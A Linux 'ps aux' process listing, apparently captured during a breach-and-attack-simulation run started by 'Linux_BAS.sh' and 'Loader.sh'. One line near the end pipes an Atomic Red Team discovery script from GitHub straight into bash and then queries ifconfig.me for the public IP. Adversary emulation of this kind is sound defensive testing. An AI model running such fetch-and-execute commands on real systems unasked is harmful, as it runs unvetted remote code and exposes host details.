bas         3039  0.0  0.6 782216 10700 ?        S<sl 16:49   0:00 /usr/bin/wireplumber
bas         3043  0.0  0.5 394652  9140 ?        S<sl 16:49   0:00 /usr/bin/pipewire-pulse
bas         3111  0.0  0.5 891836  8700 ?        Ssl  16:49   0:00 /usr/libexec/gsd-xsettings
bas         3131  0.0  0.5 990348  8696 ?        Ssl  16:49   0:00 /usr/libexec/xdg-desktop-portal
bas         3145  0.0  0.2 753144  4644 ?        Ssl  16:49   0:00 /usr/libexec/xdg-document-portal
root        3159  0.0  0.0   2456  1184 ?        Ss   16:49   0:00 fusermount3 -o rw,nosuid,nodev,fsname=portal,auto_unmount,subtype=portal -- /run/user/1000/doc
bas         3176  0.0  0.2 454380  4280 ?        Ssl  16:49   0:00 /usr/libexec/gvfsd-metadata
bas         3177  0.0  0.3 243960  5776 ?        Sl   16:49   0:00 /usr/libexec/ibus-x11
bas         3191  0.0  0.7 742804 12168 ?        Ssl  16:49   0:00 /usr/libexec/xdg-desktop-portal-gnome
bas         3206  0.0  0.7 1312840 12008 ?       Sl   16:49   0:00 /usr/libexec/mutter-x11-frames
bas         3260  0.0  0.5 715204  8664 ?        Ssl  16:49   0:00 /usr/libexec/xdg-desktop-portal-gtk
root        3276  0.0  0.5 645064  9476 ?        Ssl  16:49   0:00 /usr/libexec/fwupd/fwupd
bas         3350  3.8 15.4 2043316 264988 ?      Ssl  16:49   2:19 /usr/bin/ptyxis --gapplication-service
bas         3357  0.0  0.3 377752  5540 ?        Ssl  16:49   0:01 /usr/libexec/ptyxis-agent --socket-fd=3 --rlimit-nofile=1024
bas         3373  0.0  0.0    976     8 ?        S    16:49   0:00 catatonit -P
bas         3433  0.0  0.1 230032  3268 pts/1    Ss   16:49   0:00 /usr/bin/bash
bas         3472  1.4 10.9 2035064 187632 ?      Ssl  16:49   0:51 /usr/bin/nautilus --gapplication-service
bas         3476  0.0  0.3 757084  6164 ?        Sl   16:49   0:00 /usr/libexec/gvfsd-trash --spawner :1.17 /org/gtk/gvfs/exec_spaw/0
bas         3495  0.1  1.3 1163816 23552 ?       SNsl 16:49   0:04 /usr/libexec/tracker-miner-fs-3
bas         3501  0.0  0.2 229240  4680 ?        Ssl  16:49   0:00 /usr/libexec/dconf-service
bas         3526  0.0  0.3 609604  6264 ?        Sl   16:49   0:00 /usr/libexec/gvfsd-recent --spawner :1.17 /org/gtk/gvfs/exec_spaw/1
bas         3527  0.0  0.3 609832  5768 ?        Sl   16:49   0:00 /usr/libexec/gvfsd-network --spawner :1.17 /org/gtk/gvfs/exec_spaw/2
bas         3538  0.0  0.3 611836  6144 ?        Sl   16:49   0:00 /usr/libexec/gvfsd-dnssd --spawner :1.17 /org/gtk/gvfs/exec_spaw/3
bas         3544  0.0  0.3 683148  5972 ?        Sl   16:49   0:00 /usr/libexec/gvfsd-wsdd --spawner :1.17 /org/gtk/gvfs/exec_spaw/4
bas         3552  0.0  0.3 259768  6448 ?        S    16:49   0:00 /usr/bin/python3 /usr/bin/wsdd --no-host --discovery --listen /run/user/1000/gvfsd/wsdd
bas         3634  0.0  0.4 685860  7572 ?        Sl   16:49   0:00 /usr/libexec/gvfsd-admin --spawner :1.17 /org/gtk/gvfs/exec_spaw/6 --address unix:path=/run/user/1000/bus --dir /run/user/1000
root        3649  0.0  0.5  23148  8772 ?        Ss   16:49   0:00 /usr/lib/systemd/systemd --user
root        3651  0.0  0.0  14072  1016 ?        S    16:49   0:00 (sd-pam)
root        3845  0.0  0.3 240844  6384 pts/1    S+   16:50   0:00 sudo su
root        3856  0.0  0.0 240844  1692 pts/0    Ss   16:50   0:00 sudo su
root        3857  0.0  0.2 232400  3728 pts/0    S    16:50   0:00 su
root        3858  0.0  0.2 230032  3868 pts/0    S    16:50   0:00 bash
root        3974  0.0  0.3 240848  5220 ?        S    16:51   0:00 sudo su
root        3976  0.0  0.0 240848  1436 pts/3    Ss   16:51   0:00 sudo su
root        3977  0.0  0.2 232400  3768 pts/3    S    16:51   0:00 su
root        3978  0.0  0.2 230032  3936 pts/3    S+   16:51   0:00 bash
root        4067  0.0  0.1   8528  2872 ?        Ss   16:52   0:00 /usr/bin/dbus-broker-launch --scope user
root        4069  0.0  0.1   5132  2104 ?        S    16:52   0:00 dbus-broker --log 4 --controller 9 --machine-id cc6480923f0440b7819eac4199c82ea8 --max-bytes 100000000000000 --max-fds 25000000000000 --max-matches 5000000000
root        4175  0.0  0.3 535380  5816 ?        Ssl  16:52   0:00 /usr/libexec/gvfsd
root        4181  0.0  0.3 752392  5256 ?        Sl   16:52   0:00 /usr/libexec/gvfsd-fuse /run/user/0/gvfs -f
root        4182  0.0  0.3 757084  6128 ?        Sl   16:52   0:00 /usr/libexec/gvfsd-trash --spawner :1.6 /org/gtk/gvfs/exec_spaw/0
root        4209  0.0  0.4 694084  8300 ?        Ssl  16:52   0:00 /usr/libexec/xdg-desktop-portal
root        4214  0.0  0.2 527220  4672 ?        Ssl  16:52   0:00 /usr/libexec/xdg-permission-store
root        4219  0.0  0.4 903704  7648 ?        Ssl  16:52   0:00 /usr/libexec/xdg-document-portal
root        4225  0.0  0.0   2456  1292 ?        Ss   16:52   0:00 fusermount3 --auto-unmount -- /run/user/0/doc
root        4242  0.0  0.3 380352  5204 ?        Ssl  16:52   0:00 /usr/libexec/at-spi-bus-launcher
root        4243  0.0  0.2 229240  4292 ?        Ssl  16:52   0:00 /usr/libexec/dconf-service
root        4252  0.0  0.1   8528  2708 ?        S    16:52   0:00 /usr/bin/dbus-broker-launch --config-file=/usr/share/defaults/at-spi2/accessibility.conf --scope user
root        4253  0.0  0.1   4640  2016 ?        S    16:52   0:00 dbus-broker --log 4 --controller 9 --machine-id cc6480923f0440b7819eac4199c82ea8 --max-bytes 100000000000000 --max-fds 6400000 --max-matches 5000000000
root        4254  0.0  0.4 612236  7800 ?        Ssl  16:52   0:00 /usr/libexec/gvfs-udisks2-volume-monitor
root        4260  0.0  0.2 527812  4884 ?        Ssl  16:52   0:00 /usr/libexec/gvfs-mtp-volume-monitor
root        4265  0.0  0.2 529408  4892 ?        Ssl  16:52   0:00 /usr/libexec/gvfs-gphoto2-volume-monitor
root        4270  0.0  0.2 527492  4736 ?        Ssl  16:52   0:00 /usr/libexec/gvfs-goa-volume-monitor
root        4274  0.0  0.5 731440  9324 ?        Ssl  16:52   0:00 /usr/libexec/goa-daemon
root        4281  0.0  0.3 689096  6696 ?        Ssl  16:52   0:00 /usr/libexec/goa-identity-service
root        4312  0.0  0.3 535872  5776 ?        Sl   16:52   0:00 /usr/libexec/gvfsd-recent --spawner :1.6 /org/gtk/gvfs/exec_spaw/1
root        4313  0.0  0.3 609832  5908 ?        Sl   16:52   0:00 /usr/libexec/gvfsd-network --spawner :1.6 /org/gtk/gvfs/exec_spaw/2
root        4324  0.0  0.3 611836  6492 ?        Sl   16:52   0:00 /usr/libexec/gvfsd-dnssd --spawner :1.6 /org/gtk/gvfs/exec_spaw/3
root        4330  0.0  0.2 233532  5024 ?        Ssl  16:52   0:00 /usr/libexec/at-spi2-registryd --use-gnome-session
root        4331  0.0  0.2 454272  4632 ?        Ssl  16:52   0:00 /usr/libexec/gvfsd-metadata
root        4332  0.0  0.3 609416  6128 ?        Sl   16:52   0:00 /usr/libexec/gvfsd-wsdd --spawner :1.6 /org/gtk/gvfs/exec_spaw/4
root        4343  0.0  0.9 259768 16188 ?        S    16:52   0:00 /usr/bin/python3 /usr/bin/wsdd --no-host --discovery --listen /run/user/0/gvfsd/wsdd
bas         5246  0.0  0.2 230032  3828 pts/4    Ss   16:59   0:00 /usr/bin/bash
root        5290  0.0  0.3 240844  6772 pts/4    S+   17:00   0:00 sudo su
root        5301  0.0  0.1 240844  2020 pts/5    Ss   17:00   0:00 sudo su
root        5302  0.0  0.2 232400  3764 pts/5    S    17:00   0:00 su
root        5303  0.0  0.1 230032  3408 pts/5    S    17:00   0:00 bash
root        7021  0.5  0.0      0     0 ?        I    17:11   0:12 [kworker/u513:0-events_unbound]
bas         7026  0.0  0.1 230032  3292 pts/6    Ss   17:12   0:00 /usr/bin/bash
root        7049  0.0  0.3 240844  5968 pts/6    S+   17:12   0:00 sudo su
root        7060  0.0  0.0 240844  1620 pts/7    Ss   17:12   0:00 sudo su
root        7061  0.0  0.2 232400  3752 pts/7    S    17:12   0:00 su
root        7062  0.0  0.1 230032  3360 pts/7    S+   17:12   0:00 bash
root        7521  0.4  0.0      0     0 ?        I    17:14   0:09 [kworker/u514:5-events_unbound]
root        9085  0.7  0.0      0     0 ?        I    17:22   0:11 [kworker/u514:0-events_unbound]
root       11389  0.0  0.0      0     0 ?        I    17:25   0:00 [kworker/1:0-cgroup_destroy]
root       11452  0.0  0.1 228528  3156 pts/5    S+   17:26   0:00 bash Linux_BAS.sh
root       21637  0.0  0.0      0     0 ?        I<   17:28   0:00 [kworker/R-ib-comp-wq]
root       21638  0.0  0.0      0     0 ?        I<   17:28   0:00 [kworker/R-ib-comp-unb-wq]
root       21639  0.0  0.0      0     0 ?        I<   17:28   0:00 [kworker/R-ib_mcast]
root       21640  0.0  0.0      0     0 ?        I<   17:28   0:00 [kworker/R-ib_nl_sa_wq]
root       21669  0.0  0.2 378776  3452 ?        Ss   17:28   0:00 keyboxd --homedir /root/.gnupg --daemon
root       22026  0.0  0.1 450168  2088 ?        Ssl  17:28   0:00 gpg-agent --homedir /root/.gnupg --use-standard-socket --daemon
root       22028  0.0  0.1 303008  2708 ?        SLl  17:28   0:00 scdaemon --multi-server
root       32739  0.0  0.0      0     0 ?        I    17:30   0:00 [kworker/1:1-ata_sff]
root       33012  0.4  0.0      0     0 ?        I    17:34   0:03 [kworker/u513:2-flush-253:0]
root       33109  0.0  0.0      0     0 ?        I    17:37   0:00 [kworker/0:2-ata_sff]
root       33395  0.8  0.0      0     0 ?        I    17:40   0:04 [kworker/u513:3-events_unbound]
root       33858  0.0  0.0      0     0 ?        I    17:41   0:00 [kworker/1:2-events]
root       33880  0.0  0.0      0     0 ?        I    17:42   0:00 [kworker/0:1-events]
root       33923  0.0  0.4  16620  7312 ?        S    17:45   0:00 systemd-userwork: waiting...
root       33924  0.0  0.4  16492  7308 ?        S    17:45   0:00 systemd-userwork: waiting...
root       33925  0.0  0.3  16456  6848 ?        S    17:45   0:00 systemd-userwork: waiting...
root       33927  0.0  0.4  16492  7320 ?        S    17:45   0:00 systemd-userwork: waiting...
root       33929  0.0  0.4  16620  7348 ?        S    17:45   0:00 systemd-userwork: waiting...
root       34171  0.0  0.0      0     0 ?        I    17:47   0:00 [kworker/u514:1]
bas        34179  0.0  0.3 230032  5580 pts/8    Ss   17:47   0:00 /usr/bin/bash
root       34202  0.0  0.5 240844  8772 pts/8    S+   17:47   0:00 sudo su
root       34213  0.0  0.1 240844  2752 pts/9    Ss   17:47   0:00 sudo su
root       34214  0.0  0.3 232400  5220 pts/9    S    17:47   0:00 su
root       34215  0.0  0.3 230032  5600 pts/9    S+   17:47   0:00 bash
root       34294  0.1  0.0      0     0 ?        I    17:48   0:00 [kworker/0:0-ata_sff]
root       34323  0.1  0.4 311488  8552 ?        Ssl  17:48   0:00 /usr/libexec/nm-dispatcher
root       34337  0.0  0.2 228396  3516 pts/0    S+   17:48   0:00 bash Linux_BAS.sh
root       34341  0.0  0.1 228396  3348 pts/0    S+   17:48   0:00 /bin/bash ./Loader.sh Config/Collection_RHEL.json
root       34350  0.0  0.1 228396  1984 pts/0    S+   17:48   0:00 /bin/bash ./Loader.sh Config/Collection_RHEL.json
root       34351  0.0  0.2 228396  3468 pts/0    S+   17:48   0:00 bash -c export LOG_FILE="/var/log/commands.log"; trap 'logger -p local1.notice -t "[bash] root" "$BASH_COMMAND"' DEBUG;curl -s "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh" | bash -s > "Output/Collection/T1074.001_Collection.txt" && curl ifconfig.me
root       34355  0.0  0.1 228396  3408 pts/0    S+   17:48   0:00 bash -s
root       34371  200  0.2 230828  4244 pts/0    R+   17:48   0:00 ps aux
